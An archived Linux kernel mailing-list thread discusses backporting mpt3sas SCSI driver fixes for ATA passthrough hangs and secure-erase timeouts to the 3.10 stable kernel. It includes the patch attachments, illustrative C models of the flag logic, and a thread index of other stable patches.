@@ -3568,6 +3570,19 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		return 0;
 	}
 
+	/*
+	 * Bug work around for firmware SATL handling.  The loop
+	 * is based on atomic operations and ensures consistency
+	 * since we're lockless at this point
+	 */
+	do {
+		if (test_bit(0, &sas_device_priv_data->ata_command_pending)) {
+			scmd->result = SAM_STAT_BUSY;
+			scmd->scsi_done(scmd);
+			return 0;
+		}
+	} while (_scsih_set_satl_pending(scmd, true));
+
 	sas_target_priv_data = sas_device_priv_data->sas_target;
 
 	/* invalid device handle */
@@ -4057,8 +4072,7 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+	_scsih_set_satl_pending(scmd, false);
 
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07  6:59         ` Willy Tarreau
@ 2017-02-07 17:02           ` James Bottomley
  2017-02-07 17:12             ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: James Bottomley @ 2017-02-07 17:02 UTC (permalink / raw)
  To: Willy Tarreau
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> Hi James,
> 
> On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> (...)
> > > We don't have the referenced commit above in 3.10 so we should be
> > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > either, so that makes me feel confident that we can skip it in 
> > > 3.10 as well.
> > 
> > The original was also racy with respect to multiple commands, so 
> > the above fixed the race as well.
> 
> OK so I tried to backport it to 3.10. I dropped a few parts which 
> were addressing this one marked for stable 4.4+ :
>     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> 
> And I got the attached patch. All I know is that it builds. I'd 
> appreciate it if someone could confirm its validity, in which case
> I'll add it.

The two patches apply without fuzz to your tree and the combination is
a far better bug fix than the original regardless of whether 7ff723a
exists in your tree or not.  By messing with the patches all you do is
add the potential for introducing new bugs for no benefit, so why take
risk for no upside?

James

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07 17:02           ` James Bottomley
@ 2017-02-07 17:12             ` Willy Tarreau
  2017-02-08  6:53               ` Willy Tarreau
  0 siblings, 1 reply; 239+ messages in thread
From: Willy Tarreau @ 2017-02-07 17:12 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

On Tue, Feb 07, 2017 at 09:02:51AM -0800, James Bottomley wrote:
> On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> > Hi James,
> > 
> > On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> > (...)
> > > > We don't have the referenced commit above in 3.10 so we should be
> > > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > > either, so that makes me feel confident that we can skip it in 
> > > > 3.10 as well.
> > > 
> > > The original was also racy with respect to multiple commands, so 
> > > the above fixed the race as well.
> > 
> > OK so I tried to backport it to 3.10. I dropped a few parts which 
> > were addressing this one marked for stable 4.4+ :
> >     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> > 
> > And I got the attached patch. All I know is that it builds. I'd 
> > appreciate it if someone could confirm its validity, in which case
> > I'll add it.
> 
> The two patches apply without fuzz to your tree and the combination is
> a far better bug fix than the original regardless of whether 7ff723a
> exists in your tree or not.  By messing with the patches all you do is
> add the potential for introducing new bugs for no benefit, so why take
> risk for no upside?

Just because I was advised to apply this fix which is supposed to fix
a regression brought by 7ff723a which itself is marked to fix 4.4+ only
and which doesn't apply to 3.10. So now I'm getting confused because
you say that these patches apply without fuzz but one part definitely
is rejected and the other one has to be applied by hand. I don't want
to take a risk but I'm faced with these options :
  - drop all these patches and stay as 3.10.104 is
  - merge the "secure erase premature" + the part of the patch
    that supposedly fixes the regression it introduced
  - merge this fix + 7ff723a + whatever it depends on (not fond of
    it)

In all cases I don't even have the hardware to validate anything. I'd
be more tempted with the first two options. If you think I'm taking
risks by backporting the relevant part of the fix, I'll simply drop
them all and leave the code as it is now.

Thanks,
Willy

^ permalink raw reply	[flat|nested] 239+ messages in thread

* Re: [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination
  2017-02-07 17:12             ` Willy Tarreau
@ 2017-02-08  6:53               ` Willy Tarreau
  0 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-08  6:53 UTC (permalink / raw)
  To: James Bottomley
  Cc: Sathya Prakash Veerichetty, linux-kernel, stable, linux,
	Andrey Grodzovsky, linux-scsi, Chaitra Basappa,
	Suganath Prabu Subramani, Sreekanth Reddy, Hannes Reinecke,
	Martin K . Petersen

[-- Attachment #1: Type: text/plain, Size: 2630 bytes --]

On Tue, Feb 07, 2017 at 06:12:34PM +0100, Willy Tarreau wrote:
> On Tue, Feb 07, 2017 at 09:02:51AM -0800, James Bottomley wrote:
> > On Tue, 2017-02-07 at 07:59 +0100, Willy Tarreau wrote:
> > > Hi James,
> > > 
> > > On Mon, Feb 06, 2017 at 10:38:48PM -0800, James Bottomley wrote:
> > > > On Mon, 2017-02-06 at 23:26 +0100, Willy Tarreau wrote:
> > > (...)
> > > > > We don't have the referenced commit above in 3.10 so we should be
> > > > > safe. Additionally I checked that neither 4.4 nor 3.12 have them 
> > > > > either, so that makes me feel confident that we can skip it in 
> > > > > 3.10 as well.
> > > > 
> > > > The original was also racy with respect to multiple commands, so 
> > > > the above fixed the race as well.
> > > 
> > > OK so I tried to backport it to 3.10. I dropped a few parts which 
> > > were addressing this one marked for stable 4.4+ :
> > >     7ff723a ("scsi: mpt3sas: Unblock device after controller reset")
> > > 
> > > And I got the attached patch. All I know is that it builds. I'd 
> > > appreciate it if someone could confirm its validity, in which case
> > > I'll add it.
> > 
> > The two patches apply without fuzz to your tree and the combination is
> > a far better bug fix than the original regardless of whether 7ff723a
> > exists in your tree or not.  By messing with the patches all you do is
> > add the potential for introducing new bugs for no benefit, so why take
> > risk for no upside?
> 
> Just because it was suggested that I apply this fix, which is supposed
> to fix a regression brought by 7ff723a, which itself is marked as a fix
> for 4.4+ only and doesn't apply to 3.10. So now I'm getting confused,
> because you say that these patches apply without fuzz, but one part is
> definitely rejected and the other one has to be applied by hand. I don't
> want to take a risk, but I'm faced with these options:
>   - drop all these patches and stay as 3.10.104 is
>   - merge the "secure erase premature" + the part of the patch
>     that supposedly fixes the regression it introduced
>   - merge this fix + 7ff723a + whatever it depends on (not fond of
>     it)
> 
> In all cases I don't even have the hardware to validate anything. I'd
> be more tempted with the first two options. If you think I'm taking
> risks by backporting the relevant part of the fix, I'll simply drop
> them all and leave the code as it is now.

So I was able to backport the fix marked for 4.4+ (7ff723a) and the one
suggested by Sathya (ffb5845). The context was slightly different, but
the changes were obvious enough to look good. If everyone is OK with it,
I'll add these two commits. Here are the backports.

Willy

[-- Attachment #2: 0001-scsi-mpt3sas-Unblock-device-after-controller-reset.patch --]
[-- Type: text/plain, Size: 2392 bytes --]

From acd34b89fe261c88398e26bd3055000052eb7808 Mon Sep 17 00:00:00 2001
From: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Date: Thu, 17 Nov 2016 16:15:58 +0530
Subject: scsi: mpt3sas: Unblock device after controller reset

commit 7ff723ad0f87feba43dda45fdae71206063dd7d4 upstream.

While issuing any ATA passthrough command to firmware the driver will
block the device. But it will unblock the device only if the I/O
completes through the ISR path. If a controller reset occurs before
command completion the device will remain in blocked state.

Make sure we unblock the device following a controller reset if an ATA
passthrough command was queued.

[mkp: clarified patch description]

Cc: <stable@vger.kernel.org> # v4.4+
Fixes: ac6c2a93bd07 ("mpt3sas: Fix for SATA drive in blocked state, after diag reset")
Signed-off-by: Suganath Prabu S <suganath-prabu.subramani@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
[wt: adjust context]
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 13 ++++++++-----
 1 file changed, 8 insertions(+), 5 deletions(-)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index e414b71..8979403 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3390,6 +3390,11 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc,
 		    le16_to_cpu(event_data->VolDevHandle));
 }
 
+static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+{
+	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+}
+
 /**
  * _scsih_flush_running_cmds - completing outstanding commands.
  * @ioc: per adapter object
@@ -3411,6 +3416,9 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc)
 		if (!scmd)
 			continue;
 		count++;
+		if (ata_12_16_cmd(scmd))
+			scsi_internal_device_unblock(scmd->device,
+							SDEV_RUNNING);
 		mpt3sas_base_free_smid(ioc, smid);
 		scsi_dma_unmap(scmd);
 		if (ioc->pci_error_recovery)
@@ -3515,11 +3523,6 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status)
 	    SAM_STAT_CHECK_CONDITION;
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
-{
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
-}
-
 /**
  * _scsih_qcmd_lck - main scsi request entry point
  * @scmd: pointer to scsi command object
-- 
2.8.0.rc2.1.gbe9624a
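
The behaviour described in the commit message above can be illustrated
with a small userspace model. This is only a sketch, not driver code:
struct model_dev, struct model_cmd and the model_*() functions are
hypothetical stand-ins for the SCSI device, the scsi_cmnd and the
driver entry points, and a plain bool replaces the real device block
state. The opcode values are those of ATA_12 and ATA_16.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-ins; the real driver uses struct scsi_device etc. */
struct model_dev {
	bool blocked;		/* models the "device blocked" state */
};

struct model_cmd {
	unsigned char opcode;	/* models scmd->cmnd[0] */
	struct model_dev *dev;
};

/* Same test as ata_12_16_cmd(): ATA_12 is 0xa1, ATA_16 is 0x85. */
static bool model_ata_12_16_cmd(const struct model_cmd *cmd)
{
	return cmd->opcode == 0xa1 || cmd->opcode == 0x85;
}

/* Queueing an ATA passthrough command blocks the device. */
static void model_queue(struct model_cmd *cmd)
{
	if (model_ata_12_16_cmd(cmd))
		cmd->dev->blocked = true;
}

/* Normal completion (ISR path) unblocks the device again. */
static void model_io_done(struct model_cmd *cmd)
{
	if (model_ata_12_16_cmd(cmd))
		cmd->dev->blocked = false;
}

/*
 * Controller reset path: every outstanding command is flushed without
 * going through model_io_done(), so the unblock has to happen here as
 * well, otherwise the device stays blocked. Returns the number of
 * commands flushed.
 */
static int model_flush_running_cmds(struct model_cmd **slots, size_t n)
{
	int count = 0;
	size_t i;

	for (i = 0; i < n; i++) {
		struct model_cmd *cmd = slots[i];

		if (!cmd)
			continue;
		count++;
		if (model_ata_12_16_cmd(cmd))
			cmd->dev->blocked = false;
		slots[i] = NULL;
	}
	return count;
}
```

In this model, dropping the unblock from model_flush_running_cmds()
reproduces the reported symptom: a device with a queued passthrough
command remains blocked after a reset.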


[-- Attachment #3: 0002-scsi-mpt3sas-fix-hang-on-ata-passthrough-commands.patch --]
[-- Type: text/plain, Size: 5552 bytes --]

From 4367c8585788a98b1cc2f36af40a3d4f1fef86d0 Mon Sep 17 00:00:00 2001
From: James Bottomley <James.Bottomley@HansenPartnership.com>
Date: Sun, 1 Jan 2017 09:39:24 -0800
Subject: scsi: mpt3sas: fix hang on ata passthrough commands

commit ffb58456589443ca572221fabbdef3db8483a779 upstream.

mpt3sas has a firmware failure where it can only handle one pass through
ATA command at a time.  If another comes in, contrary to the SAT
standard, it will hang until the first one completes (causing long
commands like secure erase to timeout).  The original fix was to block
the device when an ATA command came in, but this caused a regression
with

commit 669f044170d8933c3d66d231b69ea97cb8447338
Author: Bart Van Assche <bart.vanassche@sandisk.com>
Date:   Tue Nov 22 16:17:13 2016 -0800

    scsi: srp_transport: Move queuecommand() wait code to SCSI core

So fix the original fix of the secure erase timeout by properly
returning SAM_STAT_BUSY like the SAT recommends.  The original patch
also had a concurrency problem since scsih_qcmd is lockless at that
point (this is fixed by using atomic bitops to set and test the flag).

[mkp: addressed feedback wrt. test_bit and fixed whitespace]

Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature termination)
Signed-off-by: James Bottomley <James.Bottomley@HansenPartnership.com>
Acked-by: Sreekanth Reddy <Sreekanth.Reddy@broadcom.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Reported-by: Ingo Molnar <mingo@kernel.org>
Tested-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
[wt: adjust context]
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/mpt3sas/mpt3sas_base.h  | 12 +++++++++++
 drivers/scsi/mpt3sas/mpt3sas_scsih.c | 40 +++++++++++++++++++++++-------------
 2 files changed, 38 insertions(+), 14 deletions(-)

diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h
index 994656c..997e13f 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_base.h
+++ b/drivers/scsi/mpt3sas/mpt3sas_base.h
@@ -219,6 +219,7 @@ struct MPT3SAS_TARGET {
  * @eedp_enable: eedp support enable bit
  * @eedp_type: 0(type_1), 1(type_2), 2(type_3)
  * @eedp_block_length: block size
+ * @ata_command_pending: SATL passthrough outstanding for device
  */
 struct MPT3SAS_DEVICE {
 	struct MPT3SAS_TARGET *sas_target;
@@ -227,6 +228,17 @@ struct MPT3SAS_DEVICE {
 	u8	configured_lun;
 	u8	block;
 	u8	tlr_snoop_check;
+	/*
+	 * Bug workaround for SATL handling: the mpt2/3sas firmware
+	 * doesn't return BUSY or TASK_SET_FULL for subsequent
+	 * commands while a SATL pass through is in operation as the
+	 * spec requires, it simply does nothing with them until the
+	 * pass through completes, causing them possibly to timeout if
+	 * the passthrough is a long executing command (like format or
+	 * secure erase).  This variable allows us to do the right
+	 * thing while a SATL command is pending.
+	 */
+	unsigned long ata_command_pending;
 };
 
 #define MPT3_CMD_NOT_USED	0x8000	/* free */
diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
index 8979403..1d6e115 100644
--- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c
+++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c
@@ -3390,9 +3390,18 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc,
 		    le16_to_cpu(event_data->VolDevHandle));
 }
 
-static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd)
+static int _scsih_set_satl_pending(struct scsi_cmnd *scmd, bool pending)
 {
-	return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16);
+	struct MPT3SAS_DEVICE *priv = scmd->device->hostdata;
+
+	if (scmd->cmnd[0] != ATA_12 && scmd->cmnd[0] != ATA_16)
+		return 0;
+
+	if (pending)
+		return test_and_set_bit(0, &priv->ata_command_pending);
+
+	clear_bit(0, &priv->ata_command_pending);
+	return 0;
 }
 
 /**
@@ -3416,9 +3425,7 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc)
 		if (!scmd)
 			continue;
 		count++;
-		if (ata_12_16_cmd(scmd))
-			scsi_internal_device_unblock(scmd->device,
-							SDEV_RUNNING);
+		_scsih_set_satl_pending(scmd, false);
 		mpt3sas_base_free_smid(ioc, smid);
 		scsi_dma_unmap(scmd);
 		if (ioc->pci_error_recovery)
@@ -3550,13 +3557,6 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		scsi_print_command(scmd);
 #endif
 
-	/*
-	 * Lock the device for any subsequent command until command is
-	 * done.
-	 */
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_block(scmd->device);
-
 	scmd->scsi_done = done;
 	sas_device_priv_data = scmd->device->hostdata;
 	if (!sas_device_priv_data || !sas_device_priv_data->sas_target) {
@@ -3571,6 +3571,19 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *))
 		return 0;
 	}
 
+	/*
+	 * Bug work around for firmware SATL handling.  The loop
+	 * is based on atomic operations and ensures consistency
+	 * since we're lockless at this point
+	 */
+	do {
+		if (test_bit(0, &sas_device_priv_data->ata_command_pending)) {
+			scmd->result = SAM_STAT_BUSY;
+			scmd->scsi_done(scmd);
+			return 0;
+		}
+	} while (_scsih_set_satl_pending(scmd, true));
+
 	sas_target_priv_data = sas_device_priv_data->sas_target;
 
 	/* invalid device handle */
@@ -4060,8 +4073,7 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply)
 	if (scmd == NULL)
 		return 1;
 
-	if (ata_12_16_cmd(scmd))
-		scsi_internal_device_unblock(scmd->device, SDEV_RUNNING);
+	_scsih_set_satl_pending(scmd, false);
 
 	mpi_request = mpt3sas_base_get_msg_frame(ioc, smid);
 
-- 
2.8.0.rc2.1.gbe9624a
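
The test-and-set gate used by the patch above can be sketched in
userspace with C11 atomics. This is an illustration under stated
assumptions, not the driver's implementation: struct sat_device,
sat_set_pending(), sat_submit() and sat_complete() are hypothetical
names, atomic_exchange() stands in for test_and_set_bit(), and the
SUBMIT_BUSY return value stands in for completing the command with
SAM_STAT_BUSY.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical model of the per-device private data. */
struct sat_device {
	atomic_bool ata_command_pending;
};

enum submit_result { SUBMIT_QUEUED, SUBMIT_BUSY };

/* ATA_12 is opcode 0xa1 and ATA_16 is opcode 0x85. */
static bool sat_is_passthrough(unsigned char opcode)
{
	return opcode == 0xa1 || opcode == 0x85;
}

/*
 * Models _scsih_set_satl_pending(): for a passthrough command, either
 * atomically set the flag and return its previous value, or clear it.
 * Any other command leaves the flag alone and returns false.
 */
static bool sat_set_pending(struct sat_device *dev, unsigned char opcode,
			    bool pending)
{
	if (!sat_is_passthrough(opcode))
		return false;

	if (pending)
		return atomic_exchange(&dev->ata_command_pending, true);

	atomic_store(&dev->ata_command_pending, false);
	return false;
}

/*
 * Models the loop added to the queuecommand path: report BUSY while a
 * passthrough is outstanding; otherwise try to claim the flag and
 * retry if another submitter claimed it first.
 */
static enum submit_result sat_submit(struct sat_device *dev,
				     unsigned char opcode)
{
	do {
		if (atomic_load(&dev->ata_command_pending))
			return SUBMIT_BUSY;
	} while (sat_set_pending(dev, opcode, true));

	return SUBMIT_QUEUED;
}

/* Models the completion and flush paths: release the flag. */
static void sat_complete(struct sat_device *dev, unsigned char opcode)
{
	sat_set_pending(dev, opcode, false);
}
```

Because only a passthrough opcode can set or clear the flag, the
completion of an unrelated command cannot release a gate that a long
running passthrough command still holds.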



Thread overview: 239+ messages
2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 101/319] fix memory leaks in tracing_buffers_splice_read() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 102/319] arc: don't leak bits of kernel stack into coredump Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 103/319] Fix potential infoleak in older kernels Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 104/319] swapfile: fix memory corruption via malformed swapfile Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 105/319] coredump: fix unfreezable coredumping task Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 106/319] usb: dwc3: gadget: increment request->actual once Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 123/319] Fix USB CB/CBI storage devices with CONFIG_VMAP_STACK=y Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 124/319] ALSA: rawmidi: Fix possible deadlock with virmidi registration Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 125/319] ALSA: timer: fix NULL pointer dereference in read()/ioctl() race Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 126/319] ALSA: timer: fix division by zero after SNDRV_TIMER_IOCTL_CONTINUE Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 127/319] ALSA: timer: fix NULL pointer dereference on memory allocation failure Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 128/319] ALSA: ali5451: Fix out-of-bound position reporting Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 129/319] ALSA: pcm : Call kill_fasync() in stream lock Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 130/319] zfcp: fix fc_host port_type with NPIV Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 131/319] zfcp: fix ELS/GS request&response length for hardware data router Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 132/319] zfcp: close window with unblocked rport during rport gone Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 133/319] zfcp: retain trace level for SCSI and HBA FSF response records Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 134/319] zfcp: restore: Dont use 0 to indicate invalid LUN in rec trace Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 135/319] zfcp: trace on request for open and close of WKA port Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 136/319] zfcp: restore tracing of handle for port and LUN with HBA records Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 137/319] zfcp: fix D_ID field with actual value on tracing SAN responses Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 138/319] zfcp: fix payload trace length for SAN request&response Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 139/319] zfcp: trace full payload of all SAN records (req,resp,iels) Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 140/319] scsi: zfcp: spin_lock_irqsave() is not nestable Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 141/319] scsi: mpt3sas: Fix secure erase premature termination Willy Tarreau
2017-02-06 16:21   ` Sathya Prakash Veerichetty
2017-02-06 22:26     ` Willy Tarreau
2017-02-07  6:38       ` James Bottomley
2017-02-07  6:59         ` Willy Tarreau
2017-02-07 17:02           ` James Bottomley
2017-02-07 17:12             ` Willy Tarreau
2017-02-08  6:53               ` Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 142/319] mpt2sas: " Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 143/319] scsi: megaraid_sas: Fix data integrity failure for JBOD (passthrough) devices Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 144/319] scsi: megaraid_sas: fix macro MEGASAS_IS_LOGICAL to avoid regression Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 145/319] scsi: ibmvfc: Fix I/O hang when port is not mapped Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 155/319] ext4: sanity check the block and cluster size at mount time Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 156/319] reiserfs: fix "new_insert_key may be used uninitialized ..." Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 157/319] reiserfs: Unlock superblock before calling reiserfs_quota_on_mount() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 158/319] xfs: fix superblock inprogress check Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 159/319] libxfs: clean up _calc_dquots_per_chunk Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 160/319] btrfs: ensure that file descriptor used with subvol ioctls is a dir Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 161/319] ocfs2/dlm: fix race between convert and migration Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 162/319] ocfs2: fix start offset to ocfs2_zero_range_for_truncate() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 163/319] ubifs: Fix assertion in layout_in_gaps() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 164/319] ubifs: Fix xattr_names length in exit paths Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 165/319] UBIFS: Fix possible memory leak in ubifs_readdir() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 166/319] ubifs: Abort readdir upon error Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 167/319] ubifs: Fix regression in ubifs_readdir() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 168/319] UBI: fastmap: scrub PEB when bitflips are detected in a free PEB EC header Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 169/319] NFSv4.x: Fix a refcount leak in nfs_callback_up_net Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 170/319] NFSD: Using free_conn free connection Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 171/319] NFS: Don't drop CB requests with invalid principals Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 172/319] NFSv4: Open state recovery must account for file permission changes Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 173/319] fs/seq_file: fix out-of-bounds read Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 174/319] fs/super.c: fix race between freeze_super() and thaw_super() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 175/319] isofs: Do not return EACCES for unknown filesystems Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 176/319] hostfs: Freeing an ERR_PTR in hostfs_fill_sb_common() Willy Tarreau
2017-02-05 19:19 ` [PATCH 3.10 177/319] driver core: Delete an unnecessary check before the function call "put_device" Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 178/319] driver core: fix race between creating/querying glue dir and its cleanup Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 179/319] drm/radeon: fix radeon_move_blit on 32bit systems Willy Tarreau
2017-02-05 19:20 ` [PATCH 3.10 180/319] drm: Reject page_flip for !DRIVER_MODESET Willy Tarreau
